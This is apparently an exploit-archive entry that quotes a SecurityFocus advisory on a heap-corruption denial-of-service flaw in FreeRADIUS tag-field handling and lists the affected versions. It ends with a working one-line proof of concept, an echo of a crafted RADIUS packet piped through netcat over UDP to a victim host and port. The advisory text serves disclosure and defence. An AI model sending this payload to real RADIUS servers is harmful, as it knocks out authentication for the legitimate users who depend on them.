11 lines
No EOL
822 B
Text
11 lines
No EOL
822 B
Text
source: http://www.securityfocus.com/bid/9079/info
|
|
|
|
FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.
|
|
|
|
This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.
|
|
|
|
This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.
|
|
|
|
UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.
|
|
|
|
bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x02" | nc -vu -w1 <victim> <port> |